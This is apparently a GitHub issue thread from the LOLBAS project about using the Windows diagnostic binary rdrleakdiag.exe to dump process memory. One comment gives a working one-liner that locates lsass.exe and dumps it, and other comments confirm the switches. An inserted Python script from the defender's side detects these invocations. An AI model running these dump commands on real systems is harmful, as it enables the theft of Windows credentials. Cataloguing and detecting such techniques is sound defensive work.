
Validate process dump method: rdrleakdiag.exe

Open ConsciousHacker opened this issue 4 years ago • 7 comments

rdrleakdiag.exe /p <pid> /o <outputdir> /fullmemdmp /wait 1

Source: https://twitter.com/0gtweet/status/1299071304805560321?s=21

ConsciousHacker avatar Aug 28 '20 14:08 ConsciousHacker

Please do remember to use "/snap" instead of "/wait 1" for subsequent dumps. I had some replies on Twitter with information that it works only once, and "/snap" looks like a kind of solution for this.

gtworek avatar Aug 28 '20 14:08 gtworek

Will do, thanks for the information!

ConsciousHacker avatar Aug 28 '20 14:08 ConsciousHacker

FYI, you can skip running "wait" for the first run if you run "enable" first. This has the added benefit of working regardless of what was already run:

for /f "tokens=2 delims= " %J in ('"tasklist /fi "Imagename eq lsass.exe" | find "lsass""') do rdrleakdiag.exe -p %J -enable & sleep 1 & rdrleakdiag.exe -p %J -o c:\users\maximus\desktop\dumps -fullmemdmp -snap

I found the sleep was necessary to give the diagnostics engine/feature/module(?) time to start before running the dump.

gladiatx0r avatar Aug 31 '20 15:08 gladiatx0r
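A detection check for the invocations discussed in this thread, written from the defender's side as an added example (it is not part of the issue or of the LOLBAS project). It parses constructed process-creation records (Sysmon Event ID 1 / Security 4688 style, not real logs), accepts both the "/" and "-" switch spellings seen above, and rates a full-memory dump as high severity when the "/p" target PID maps to lsass.exe; the field names and sample PIDs are assumptions.

```python
# Constructed process-creation records: pid, image path and command line (not real logs).
SAMPLE_EVENTS = [
    {"pid": 756, "image": r"C:\Windows\System32\lsass.exe", "cmdline": "lsass.exe"},
    {"pid": 4120, "image": r"C:\Windows\System32\rdrleakdiag.exe",
     "cmdline": "rdrleakdiag.exe -p 756 -enable"},
    {"pid": 4133, "image": r"C:\Windows\System32\rdrleakdiag.exe",
     "cmdline": r"rdrleakdiag.exe -p 756 -o c:\dumps -fullmemdmp -snap"},
    {"pid": 4200, "image": r"C:\Windows\System32\rdrleakdiag.exe",
     "cmdline": r"rdrleakdiag.exe /p 8812 /o c:\temp /fullmemdmp /wait 1"},
    {"pid": 8812, "image": r"C:\Program Files\App\app.exe", "cmdline": "app.exe"},
]

# Images whose memory should never be dumped by an ad-hoc tool on a production host.
SENSITIVE_IMAGES = {"lsass.exe"}


def parse_rdrleakdiag(cmdline):
    """Return (target_pid, switches) for an rdrleakdiag.exe command line, else None.
    Switches may be written as '/x' or '-x'; the PID following '/p' is resolved."""
    toks = cmdline.split()
    if not toks or not toks[0].lower().endswith("rdrleakdiag.exe"):
        return None
    switches, target = set(), None
    i = 1
    while i < len(toks):
        if toks[i][:1] in "/-":
            name = toks[i][1:].lower()
            switches.add(name)
            if name == "p" and i + 1 < len(toks) and toks[i + 1].isdigit():
                target = int(toks[i + 1])
                i += 1
        i += 1
    return target, switches


def detect(events):
    """Flag rdrleakdiag 'enable' and 'fullmemdmp' stages; map the target PID to its image
    using the other process-creation events, and raise severity for sensitive targets."""
    pid_to_image = {e["pid"]: e["image"].rsplit("\\", 1)[-1].lower() for e in events}
    hits = []
    for e in events:
        parsed = parse_rdrleakdiag(e["cmdline"])
        if parsed is None:
            continue
        target, switches = parsed
        if "fullmemdmp" not in switches and "enable" not in switches:
            continue  # other rdrleakdiag usage is not a dump attempt
        target_image = pid_to_image.get(target, "<unknown>")
        hits.append({"pid": e["pid"],
                     "stage": "dump" if "fullmemdmp" in switches else "enable",
                     "target": target_image,
                     "severity": "high" if target_image in SENSITIVE_IMAGES else "medium"})
    return hits
```

Correlating the "-enable" event with the following "-fullmemdmp -snap" event on the same target PID (the sequence described in the comment above) is what distinguishes the working variant from a single failed "/wait 1" attempt.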

I just validated this process dump method. Please consider adding this native windows binary to the LOLBAS project.

C:\WINDOWS\system32>rdrleakdiag.exe /p <PID> /o <PATH> /fullmemdmp /snap

tsamuels-r7 avatar Jun 01 '21 17:06 tsamuels-r7

Windows Server 2019: execution not successful.

noob-Engle avatar Oct 18 '21 05:10 noob-Engle

It may work if you try again, replacing "/wait 1" with "/snap". I have tested it on 10.0.17763.379.

gtworek avatar Oct 18 '21 05:10 gtworek

It may work if you try again, replacing "/wait 1" with "/snap". I have tested it on 10.0.17763.379.

Well, I have already tried both; it didn't work.

XiaoliChan avatar Oct 18 '21 06:10 XiaoliChan

#216 has added rdrleakdiag.exe, I'm closing this issue for now.

wietze avatar Oct 04 '22 14:10 wietze